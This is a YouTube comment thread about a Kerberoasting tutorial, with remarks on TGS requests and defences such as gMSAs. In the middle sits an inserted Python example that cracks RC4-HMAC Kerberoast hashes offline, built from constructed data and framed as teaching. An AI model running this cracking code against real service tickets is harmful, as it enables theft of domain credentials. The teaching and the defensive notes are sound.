This guy is unstoppable, never misses a video, so damn consistent ❤
As a CRTE and CARTP holder, I'm glad to see alteredsec sponsoring the video. Hopefully we'll see the certs appear on more job postings.
So by just getting a user on a domain you can get the TGT and TGS from the domain controller, because it sees you as an authenticated user on the system.
Thanks. I have done kerberoasting before but never understood what I was doing at this level. Super cool stuff.
Good stuff John. Thanks.
First time I needed the subscribe and alarm bell button.
Great video man!
So this is why you've been asking Twitter for the password? 😂
😂😂😂😂😂
Great job... greetings from Italy
I still miss the honey badger video :(
I was contemplating sending a secret message to Kelly Ripa on X saying that I learned that she was basically on Soul Train from Questlove.
Simply amazing!!!
Awesome content 👏
Any valid coupons for CRT? :)
Finally man
What Windows Server version did you use?
Question. When you are enumerating the SPNs, must the user have access to the ones that are vulnerable, correct? So if the HTTP SPN was vulnerable but the user did not have access to it, they would not be able to get that TGS, right?
SPNs are not hidden. Everyone has access to them.
I understand that. But not everyone has access to request the TGS, correct? I.e. SQL Server. Not everyone can get this ticket, as only privileged accounts should be able to access it, so the attacker would need to compromise this type of account. But if the compromised account was a normal user and requested the TGS, wouldn't it not be granted, correct?
Everyone can request a TGS; the Domain Controller only provides security info about the user (PAC), and it's up to the service account itself to check the user's rights in the TGS.
The security concern here is that the DC uses a piece of the secret of the requested service to encrypt the TGS, which can later be used to brute-force/crack the password.
So many of these attacks rely on already having domain admin or schema admin, or assume that the IT staff is hopelessly incompetent.
They often are
No, domain admin and schema admin are not required for Kerberoasting. Those were just used to set up an SPN in AD so that he had something to attack. The actual Kerberoasting was just the last 2 minutes of the video.
@BrownCoatFan Thanks
And there are plenty of incompetent AD admins out there.
It's amazing how a 22 minute video about kerberoasting only has about 2 minutes worth of kerberoasting
I'm sayin' 😂
@hammond
What OS do you run on your bare metal?
Most likely either macOS or an SELinux distro.
thanks 👍
That's crazy - how does a typical AD setup prevent this? Is there some other system/service in place that prevents you obtaining hashes in the first place, or is it more so a matter of good password strength policies so that something like John can't crack the hashes as easily?
Yes, use a very long (25 characters) and complex password.
Prefer gMSA if your app/system supports it. If not, a long, very complex password could help...
@Nawdiral gMSAs are so nice. Password lifetime of 24 hrs and a length of 120 chars. Also, they do not pretend to be user accounts.
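The two points made above, that the DC encrypts the TGS under the service account's own key so anyone can request it and crack it offline, and that a long random password (or a gMSA's 120-character one) is what defeats the crack, can be shown end to end in code. The following is an added example, not code from the video, from John Hammond, or from any commenter. It reproduces the RC4-HMAC (etype 23) check that tools such as hashcat mode 13100 and john perform on a `$krb5tgs$23$...` line: derive the NT hash from a candidate password, derive the ticket keys (key usage 2 for a TGS ticket), RC4-decrypt the ticket body and compare the HMAC-MD5 checksum. The account name `svc_sql`, the realm `CORP.LOCAL`, the SPN, the password `Summer2024!`, the wordlist, the fixed confounder and the placeholder ticket body are all constructed for the example; nothing here touches a real domain.

```python
"""Offline cracking of a Kerberoast TGS-REP hash (RC4-HMAC, etype 23).

Added example, not from the video or the comments. All names, keys and the
ticket body are constructed locally; no domain, DC or real ticket is involved.
"""
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(16):  # round 1
            A = _rotl((A + f(B, C, D) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            A, B, C, D = D, A, B, C
        for i in range(16):  # round 2
            A = _rotl((A + g(B, C, D) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            A, B, C, D = D, A, B, C
        for i in range(16):  # round 3
            A = _rotl((A + h(B, C, D) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            A, B, C, D = D, A, B, C
        a, b, c, d = (a + A) & MASK, (b + B) & MASK, (c + C) & MASK, (d + D) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key IS the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, body); K3 = HMAC(K1, checksum)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    body = confounder + plaintext
    checksum = _hmac_md5(k1, body)
    return checksum + rc4(_hmac_md5(k1, checksum), body)


def make_kerberoast_hash(user: str, realm: str, spn: str, key: bytes,
                         enc_ticket_part: bytes, confounder: bytes) -> str:
    """What the DC hands any authenticated user, in hashcat 13100 form (usage 2 = TGS ticket)."""
    blob = rc4_hmac_encrypt(key, 2, enc_ticket_part, confounder)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_kerberoast(roast: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess: no DC contact, no lockout, one MD4 + three HMAC-MD5 + one RC4 per word."""
    _, checksum_hex, edata_hex = roast.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", 2))
        body = rc4(_hmac_md5(k1, checksum), edata)
        if hmac.compare_digest(_hmac_md5(k1, body), checksum):
            return candidate
    return None


# Constructed inputs: a weak service-account password, a stand-in for the ASN.1
# EncTicketPart, a fixed confounder for reproducibility (real KDCs use random bytes).
WEAK_PASSWORD = "Summer2024!"
FAKE_ENC_TICKET_PART = b"placeholder EncTicketPart (session key, PAC, times) - constructed"
CONFOUNDER = bytes(range(8))
WORDLIST = ["password", "Welcome1", "Winter2023", "Summer2024!", "P@ssw0rd"]
SPN = "MSSQLSvc/sql01.corp.local:1433"


def demo() -> tuple:
    """Returns (cracked weak password, result for a gMSA-style 120-char random password)."""
    weak = make_kerberoast_hash("svc_sql", "CORP.LOCAL", SPN, nt_hash(WEAK_PASSWORD),
                                FAKE_ENC_TICKET_PART, CONFOUNDER)
    strong_pw = os.urandom(60).hex()  # 120 chars, never in a wordlist
    strong = make_kerberoast_hash("gmsa_sql$", "CORP.LOCAL", SPN, nt_hash(strong_pw),
                                  FAKE_ENC_TICKET_PART, CONFOUNDER)
    return crack_kerberoast(weak, WORDLIST), crack_kerberoast(strong, WORDLIST)


if __name__ == "__main__":
    print(demo())  # ('Summer2024!', None)
```

The DC never sees the guesses: each attempt costs one MD4 and a few HMAC-MD5/RC4 operations on the attacker's GPU, which is why a 13-character policy only buys time while a 120-character rotating gMSA password puts the key beyond any wordlist or mask attack. Enforcing AES-only (etypes 17/18) on service accounts removes this cheap RC4 path, and a user account requesting TGS tickets for many SPNs with etype 23 is the thing to alert on in event 4769.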
🔥🔥🔥🔥🔥
It is a shame there's no easy way to snapshot an AD, no?
Use excalidraw next time 😂
Alh4zr3d, is it you 🤨🤭😅🥳
Taylor Jose Lee Jeffrey Williams Timothy
😃 🚀 ❤️
first
👑 here's your crown
@baxsm thanks bud
Frist hehe
I like you, but this one was a weak video. The whole scripting thing is way too much to "learn Active Directory Kerberoasting".
I mean... yeah; with domain admin privileges anything is possible. So? That's like saying "root bad! root evil!". Yes. Yes, it is. Very. Much more than you can imagine. So?
Kerberoasting is done from any low privilege domain user. We used the domain user account "Alice".
You know, talking this fast, you're not really teaching anything as much as blowing through content that isn't digestible by people.
Every time I watch @johnhammond I just feel like an idiot, so unworthy 😞
I actively despise AD and I don't even have a logical reason for it. Just gut feeling.
Pretty useless information if you have a minimum requirement of at least 13 characters with good complexity, a good EDR installed, etc.
@hammond
What OS do you run on your bare metal?
If you mean the OS running on his real machine, then it's Windows 10.